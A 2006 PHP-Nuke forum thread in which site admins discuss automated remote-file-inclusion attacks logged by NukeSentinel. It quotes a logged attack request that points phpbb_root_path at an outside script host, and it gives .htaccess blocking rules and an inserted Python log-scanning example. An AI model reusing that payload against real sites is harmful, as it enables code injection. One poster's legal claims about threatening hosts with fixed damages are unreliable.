Ravens PHP Scripts: Forums
Ravens PHP Scripts And Web Hosting Forum Index -> Hack Attempt Script
leo51
Worker
Joined: Sep 09, 2004
Posts: 106
Location: Canada
PostPosted: Mon Nov 13, 2006 11:17 pm

I am trying to understand why someone continues to run these similar types of scripts on my site.

Today alone NukeSentinel logged 30 blocks from 30 different IPs, and these must be proxies; looking at the time range between 11:00 AM and 12 noon, there were no less than 20. The flags of the 30 IPs show Australia, but a NeoTrace terminates the IPs in different US states.

The attempts increased today, and that might be a result of my blocking some ranges on Sunday evening.

This has been going on for more than four months; at least, there were about two blocks every so often, but whoever it is seems to have gotten bad.

QUESTION: What is the person trying to accomplish?


Date & Time: 2006-11-13 09:54:54 CST GMT -0600
Blocked IP: 66.70.189.*
User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: libwww-perl/5.65
Query String: [ Only registered users can see links on this board! Get registered or login! ]
Get String:

Thanks
kguske
Site Admin
Joined: Jun 04, 2004
Posts: 6432
PostPosted: Mon Nov 13, 2006 11:25 pm

Don't waste your time trying to understand why attackers do so. This can be easily stopped by adding authentication on your modules/Forums/admin directory. If you search the forums here, you can find specific details for doing this, and it's an important protection that will provide excellent protection without setting off NukeSentinel.

_________________
I search, therefore I exist...
nukeSEO - nukeFEED - nukePIE - nukeSPAM - nukeWYSIWYG
montego
Site Admin
Joined: Aug 29, 2004
Posts: 9457
Location: Arizona
PostPosted: Tue Nov 14, 2006 6:57 am

See this here:
[ Only registered users can see links on this board! Get registered or login! ]

_________________
Where Do YOU Stand?
HTML Newsletter::ShortLinks::Mailer::Downloads and more...
gregexp
The Mouse Is Extension Of Arm
Joined: Feb 21, 2006
Posts: 1497
Location: In front of a screen....HELP! lol
PostPosted: Tue Nov 14, 2006 7:45 pm

leo51 wrote:
I am trying to understand why someone continues to run these similar types of scripts on my site.

First I will approach this with an answer: someone is more than likely letting something such as a program do this, and that does not always register when it is blocked. When it does register, it will try to make the same attack but with something different, usually the IP.

leo51 wrote:
QUESTION: What is the person trying to accomplish?

Some would say just to know they can, and others would say to be malicious; this is more of a personal feeling and judgement on your own.

This should be the question, which both kguske and montego have stated:

How can I stop this?

They have linked you to the correct resources, and I recommend following the instructions provided.

_________________
For those who stand shall NEVER fall and those who fall shall RISE once more!!
evaders99
Former Moderator in Good Standing
Joined: Apr 30, 2004
Posts: 3221
PostPosted: Wed Nov 15, 2006 12:21 am

It is many botnet scripts. They are targeting all kinds of PHP injections and using an IRC script to control all of them. Hundreds, thousands of machines are affected. And they keep searching using Google and other search engines.

Their current flaw seems to be the use of libwww-perl, but that may change.

_________________
- Star Wars Rebellion Network -

Need help? Nuke Patched Core, Coding Services, Webmaster Services
Digital-Overload
Hangin' Around
Joined: May 13, 2005
Posts: 26
PostPosted: Thu Nov 16, 2006 1:34 pm

I just got 69 emails from Sentinel with the same stuff, pretty much, for the last 3 hours alone... and yes, I've been getting this and the admin user injection a lot over the past 5 or 6 months. I had to remove guestbooks and set harsh permissions for users to make sure I'm not getting any spam links added to news and the forums; so far the bots can register all they want, but they get deleted when it asks for my approval.... Now I'm getting some stupid script submitting news.. lol, AHmed or some shiz like that. But yeah, I got this like 100 times in the last week, and 69 just now when I checked my email, and decided to come on here and see if anyone else got hit like me... guess so...

Date & Time: 2006-11-16 09:57:37 Pacific Standard Time GMT -0800
Blocked IP: 219.93.90.33 (which i have about 345 Different IPs in the htaccess already for this type of attack)
User ID: Anonymous (1)
Reason: Abuse-Harvest
String Match: libwww-perl
--------------------
User Agent: libwww-perl/5.65
Query String:<SITE ROOT><A BUnch Of Subfolders>/admin_styles.php?phpbb_root_path=http://www.superlist.gen.tr/lol1.txt?
Get String: <SITE ROOT> <A Bunch Of Subfolders>/admin_styles.php?phpbb_root_path=http://www.superlist.gen.tr/lol1.txt?
Post String: <SITE ROOT> <BUNCH OF Sub Folders>/admin_styles.php
Forwarded For: none
Client IP: none
Remote Address: 219.93.90.33
Remote Port: none
Request Method: GET
jakec
Site Admin
Joined: Feb 06, 2006
Posts: 3048
Location: United Kingdom
PostPosted: Thu Nov 16, 2006 1:46 pm

See this post about how to block this type of attack before it gets to Sentinel: [ Only registered users can see links on this board! Get registered or login! ]
64bitguy
The Mouse Is Extension Of Arm
Joined: Mar 06, 2004
Posts: 1164
PostPosted: Thu Nov 16, 2006 2:07 pm

I believe you are going to start seeing a lot more abuse out of Turkey.

My personal position is to completely block the entire country, either through NukeSentinel or via .htaccess or both, but that's just me. As their government doesn't care about people hosting abusive malicious code, I don't care about giving them any access or allowing their referers.

.htaccess
Code:
RewriteEngine On
# Apache rejects flags written as "[NC, OR]" (space after the comma) with "bad flag delimiters"
RewriteCond %{HTTP_REFERER} gen\.tr [NC,OR]
RewriteCond %{HTTP_REFERER} com\.tr [NC,OR]
RewriteCond %{HTTP_REFERER} org\.tr [NC,OR]
RewriteCond %{HTTP_REFERER} net\.tr [NC]
# RewriteCond lines only take effect with a RewriteRule after them; this one returns 403 Forbidden
RewriteRule .* - [F]

You get the idea. There are probably easier ways to do this, but it works for me.

_________________
Steph Benoit
100% Section 508 and W3C HTML5 and CSS Compliant (Truly) Code, because I love compliance.
evaders99
PostPosted: Thu Nov 16, 2006 7:09 pm

You are seeing a lot of abuse from across the world. It is due to many of the botnet scripts with hundreds or thousands of compromised servers. Turkey seems to be the choice for the direct script kiddies, but these libwww-perl attacks are much more than that.
technocrat
Life Cycles Becoming CPU Cycles
Joined: Jul 07, 2005
Posts: 511
PostPosted: Fri Nov 17, 2006 10:50 am

Blocking Turkey is not going to help much in this situation. The problem is that someone from one of the hacking teams wrote the Perl script to exploit this hole. Then a script kiddie website wrote a long set of directions on every step of how to use this.

Then the biggest script kiddie site out there took those directions and updated them (including how to use proxies) and posted them on their forums. It EXPLODED after that. Now every script kiddie with even a small amount of knowledge and a few proxy IPs can use this.

On the main Evo site, Sentinel blocks 200 a day. The most effective solution has been to use the .htaccess perl rewrite. It completely took it off the radar.

_________________
Nuke-Evolution
phpBB-Evolution / phpBB-Evolution Blog
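The posts above converge on two signals: the libwww-perl User-Agent and a query parameter carrying a remote URL (the phpbb_root_path=http://... shape in the quoted Sentinel notice). The following is an added example, not code from this thread or from NukeSentinel, that runs both checks over constructed Apache combined-format log lines and separates IPs to deny from requests that were actually served; the IPs, paths and rfi-host.example are assumed sample values.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed log lines modelled on the Sentinel notices quoted in this thread; not real traffic.
SAMPLE_LOG = """\
219.93.90.33 - - [16/Nov/2006:09:57:37 -0800] "GET /forums/admin/admin_styles.php?phpbb_root_path=http://rfi-host.example/lol1.txt? HTTP/1.0" 403 - "-" "libwww-perl/5.65"
192.0.2.7 - - [16/Nov/2006:10:02:11 -0800] "GET /index.php?name=Forums HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [16/Nov/2006:10:05:40 -0800] "GET /modules.php?name=News&file=article&sid=3 HTTP/1.1" 200 8000 "-" "libwww-perl/5.65"
203.0.113.4 - - [16/Nov/2006:10:07:02 -0800] "GET /forums/admin/admin_styles.php?phpbb_root_path=https://rfi-host.example/x.txt? HTTP/1.1" 200 300 "-" "Mozilla/4.0"
not a log line
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def classify(line):
    """Return (ip, status, reasons) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    reasons = []
    # Heuristic 1: the libwww-perl default User-Agent that the thread's rewrite rules key on.
    if m.group("ua").lower().startswith("libwww-perl"):
        reasons.append("ua:libwww-perl")
    # Heuristic 2: any query parameter whose value is an absolute URL (remote-file-inclusion shape).
    for key, value in parse_qsl(urlsplit(m.group("target")).query, keep_blank_values=True):
        if re.match(r"https?://", value, re.IGNORECASE):
            reasons.append("rfi:" + key)
    return m.group("ip"), int(m.group("status")), reasons

def scan(log_text):
    """Returns (deny_counts, served_rfi, unparsed): suspicious hits per IP, IPs whose RFI attempt
    got a 2xx (nothing blocked it, so that script needs checking), and unparseable line count."""
    deny_counts, served_rfi, unparsed = Counter(), [], 0
    for line in filter(None, log_text.splitlines()):
        result = classify(line)
        if result is None:
            unparsed += 1
            continue
        ip, status, reasons = result
        if reasons:
            deny_counts[ip] += 1
        if any(r.startswith("rfi:") for r in reasons) and 200 <= status < 300:
            served_rfi.append(ip)
    return deny_counts, served_rfi, unparsed
```

The User-Agent check alone also catches legitimate libwww-perl tools (the validator case raised later in this thread), so the RFI-shape reasons are the ones worth acting on first.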
Guardian2003
Site Admin
Joined: Aug 28, 2003
Posts: 6799
Location: Ha Noi, Viet Nam
PostPosted: Fri Nov 17, 2006 11:02 am

I was getting around 200 emails too, over a couple of hours each day.
64bitguy
PostPosted: Fri Nov 17, 2006 3:02 pm

I agree that Turkey isn't "alone" in this regard. Personally, I block quite a few countries simply because:

a) They have nothing to offer to my community of users.
b) They only want access for abusive purposes, including these illegal attacks.

In either case, thank you IP2C and other tools that help in blocking access. I think my original point was there is more than one way to skin a cat (thank you Apache).

As a couple of thoughts:
1) I see the strengths in blocking libwww-perl; however, keep in mind that if you spend your time doing site diagnostics (as I do), this function can be extremely useful, especially when examining compliance and statistical information regarding your site. (If you ever block yourself when running a W3C Validator, this is why! Don't forget to remove the blocker when doing that kind of work.)

2) One of the benefits to seeing an attack like this is the ability to take action regarding it. While seeking revenge is stupid, people need to remember that these kinds of malicious probes and intrusions are a violation of United States law; specifically, 18 US Code § 1030.

Please remember that under the law, the company hosting is just as guilty as the user, once that information has been identified in writing to the host.

In other words, when you see ANYONE hosting malicious scripts, you should notify the host, remind them of the law and also threaten punitive action of $10,000.00 per incident as is your right under the law.

Does this work? Darn right it does. I have reported domains after seeing extensive attacks. I do this by looking up the host info at http://dnsstuff.com and then forwarding off a copy of the abuse message, with a nice little form letter that I have already prepared, to the host of the abusive scripts. I know of at least 50 instances where my actions had domains shut down. It may not solve the problem, but it does hurt the attacker's pocketbook, as illegal abuse voids a hosting agreement. Remember that the IC3 is there for you too. People often complain about the hassle, but they have teeth and don't mind using them. Stealing administration information and passwords is a serious crime. It should be treated as such.

I can only emphasize that people should simply not lay down when attacked; fight back where you can and block where you don't want to bother. Obviously, a host in Turkey could care less about the law, which is why I simply choose to block the country entirely, as well as many other countries that operate in a similar manner of Internet lawlessness.

Finally (and I guess this goes without saying... but regardless), everyone should also be checking their sites to ensure software is adequately patched against the results of a successful attack.
leo51
PostPosted: Fri Nov 17, 2006 11:05 pm

OK, thanks guys for all of the input. I now have a better understanding of what has been going on. And yes, I was blocking these IP ranges, but it started to be a nuisance and was taking up too much of my time. Also, I was thinking that some hater was again trying to get me to reduce my numbers once I block so many countries and ranges.

About a year and a half ago, I had to block out almost the whole of Europe and Florida and start giving individuals access once they sent an email with their IP. One guy living in Europe and one in Florida (two friends) went on a rampage, posting drunk all over my forms, guestbook, request form, forums, just about anywhere on the sites where it was possible to post. They just created new users and came back, using proxies, the RIPE network and dialup.

Anyway, it was good that I made this post; it helped me understand a whole lot about the situation.

Again, many thanks
evaders99
PostPosted: Sun Nov 19, 2006 8:34 pm

Yep, definitely report them. Any site that can be secured will stop hundreds of attempts against other hosts. Mostly, these sites are compromised and the host may not even know it. So use domaintools or whatever you prefer, send an email to the technical contacts, and hope they do something.
Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours